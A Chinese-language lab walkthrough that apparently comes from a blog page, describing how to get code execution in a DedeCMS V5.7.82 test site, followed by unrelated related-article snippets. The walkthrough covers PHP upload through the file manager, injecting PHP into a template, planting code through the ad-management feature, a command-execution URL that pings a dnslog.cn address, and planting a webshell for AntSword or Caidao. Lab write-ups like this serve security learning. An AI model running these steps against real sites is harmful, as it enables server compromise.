DeDeCMS靶场攻略

ops/2025/3/28 16:18:38/

文件管理器

点击模块,选择上传文件

 在电脑中新建2.php

<?php phpinfo();?>

 访问2.php,验证是否成功

 修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

 点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

 后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

 点击[代码]

 得到地址

访问地址,无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

 在dnslog.cn上获得一个网址

再次访问,这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir 

 在得到的目录下写入木马文件

 访问后得到12.php

这些成功后可以用蚁剑,caidao连接 


http://www.ppmy.cn/ops/167546.html

相关文章

20250319在荣品的PRO-RK3566开发板的buildroot系统下使用集成的QT应用调试串口UART3

stty -F /dev/ttyS3 115200 -echo cat /dev/ttyS3 & echo serialdata > /dev/ttyS3 20250319在荣品的PRO-RK3566开发板的buildroot系统下使用集成的QT应用调试串口UART3 2025/3/19 14:17 缘起&#xff1a;在荣品的PRO-RK3566开发板的buildroot系统下&#xff0c;在命令…

无需编程!快速实现WinCC远程监控与报警

2. 无需编程&#xff01;快速实现WinCC远程监控与报警 痛点分析&#xff1a;企业缺乏专业编程人员&#xff0c;难以开发复杂监控系统。 解决方案&#xff1a;利用OPC560的即插即用功能&#xff0c;3步完成配置。 技术步骤&#xff1a; 连接OPC560至WinCC电脑&#xff1b; 通…

蓝桥杯 之 拔河(2024年C/C++ B组 H题)

文章目录 本题是 2024年C/C B组的H题首先看这个数据范围&#xff0c;个数也就在10^3,并且考察的还是连续区间的和的最小差值位置&#xff0c;注意的是这个区间是不能重合的 连续区间和的问题&#xff0c;考虑用到这个前缀和由于考察的是左右两个区间&#xff0c;并且还不能重合…

反反爬虫技术指南:原理、策略与合规实践

有很多人私下咨询爬虫技术&#xff0c;关于基础的爬虫技术我不打算介绍&#xff0c;因为网上有很多&#xff0c;CSDN都有非常多的介绍&#xff0c;就自行搜索。而今天要介绍主要是反-反-爬虫的技术指导与介绍。 引言 在如今的自媒体爆发时代&#xff0c;网络爬虫作为数据采集的…

防逆流检测仪表在分布式光伏发电系统中的应用

销售工程师 王孟春 13524471462 引言 目前&#xff0c;电网公司通常要求光伏并网系统为不可逆流发电系统&#xff0c;即光伏并网系统所发的电由本地负荷消耗&#xff0c;多余的电不允许通过低压配电变压器向上级电网逆向送电。在并网发电系统中&#xff0c;由于外部环境是不断…

安科瑞EMS:赋能双碳智慧园区建设,引领绿色未来

在全球气候变化加剧的背景下&#xff0c;中国提出"双碳"目标&#xff0c;彰显了大国担当。工业园区作为能源消耗和碳排放的主要载体&#xff0c;其绿色转型对实现双碳目标具有决定性意义。安科瑞电气股份有限公司推出的EMS能源管理系统&#xff0c;为工业园区提供了一…

EasyRTC嵌入式音视频通话SDK:微信生态支持、轻量化架构与跨平台兼容性(Linix/Windows/ARM/Android/iOS/LiteOS)

随着WebRTC技术的不断发展&#xff0c;实时音视频通信在各个领域的应用越来越广泛。EasyRTC嵌入式音视频通话SDK作为一款基于WebRTC技术的实时通信解决方案&#xff0c;凭借其强大的功能和灵活的集成能力&#xff0c;受到了越来越多开发者的关注。 一、系统架构设计 纯C语言开…

android源码应用预制

以下是详细的 Android 源码应用预制教程&#xff0c;从环境搭建到应用集成的完整流程&#xff1a; 1. 环境准备 (1) 下载 AOSP 源码 # 安装依赖&#xff08;Ubuntu 示例&#xff09; sudo apt-get install git-core gnupg flex bison build-essential zip curl zlib1g-dev gc…